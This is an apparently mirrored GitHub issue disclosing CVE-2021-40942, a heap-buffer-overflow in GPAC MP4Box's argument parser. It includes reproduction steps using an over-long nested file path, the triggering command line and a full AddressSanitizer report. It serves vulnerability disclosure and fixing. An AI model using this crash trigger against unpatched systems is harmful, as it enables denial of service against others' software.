Headline
CVE-2021-40942: heap-buffer-overflow in MP4Box at filter_core/filter.c:1454 · Issue #1908 · gpac/gpac
In GPAC MP4Box v1.1.0, there is a heap-buffer-overflow in the function filter_parse_dyn_args function in filter_core/filter.c:1454, as demonstrated by GPAC. This can cause a denial of service (DOS).
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- I looked for a similar issue and couldn’t find any.
- I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line …)
Step to reproduce:
1.get latest commit code (GPAC version 1.1.0-DEV-rev1216-gb39aa09c0-master)
2.compile with --enable-sanitizer
3.make 5 dirs which every of them has a large name(length=255), this makes the file's abs-path lengh larger than 1024, we called it large.nhml
4.run MP4Box -add {path to large.nhml} -new new.mp4
Env:
Ubunut 20.04 , clang 12.0.1
My cmd line an ASAN report
MP4Box -add ~/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/large.nhml -new new.mp4
==2343764==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00000a7a1 at pc 0x7fb8ca3e675d bp 0x7ffd40a5e9d0 sp 0x7ffd40a5e9c8
WRITE of size 1 at 0x61a00000a7a1 thread T0
#0 0x7fb8ca3e675c in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13
#1 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2
#2 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2
#3 0x7fb8ca3cc58a in gf_filter_new /home/lly/pro/gpac_public/src/filter_core/filter.c:382:7
#4 0x7fb8ca3c3d27 in gf_fs_load_source_dest_internal /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2845:12
#5 0x7fb8ca3c47b0 in gf_fs_load_source /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2885:9
#6 0x7fb8c9f97e29 in gf_media_import /home/lly/pro/gpac_public/src/media_tools/media_import.c:1469:11
#7 0x50522f in import_file /home/lly/pro/gpac_public/applications/mp4box/fileimport.c:1289:7
#8 0x4e1a09 in do_add_cat /home/lly/pro/gpac_public/applications/mp4box/main.c:4257:10
#9 0x4e79ca in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5746:13
#10 0x4ea7ca in main /home/lly/pro/gpac_public/applications/mp4box/main.c:6456:1
#11 0x7fb8c92ba0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#12 0x429a8d in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429a8d)
0x61a00000a7a1 is located 0 bytes to the right of 1313-byte region [0x61a00000a280,0x61a00000a7a1)
allocated by thread T0 here:
#0 0x4a4c69 in realloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a4c69)
#1 0x7fb8ca3e529d in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1451:12
#2 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2
#3 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13 in filter_parse_dyn_args
Shadow bytes around the buggy address:
0x0c347fff94a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff94b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff94c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff94d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c347fff94e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c347fff94f0: 00 00 00 00[01]fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c347fff9540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: ccRelated news
Gentoo Linux Security Advisory 202408-21 - Multiple vulnerabilities have been discovered in GPAC, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 2.2.0 are affected.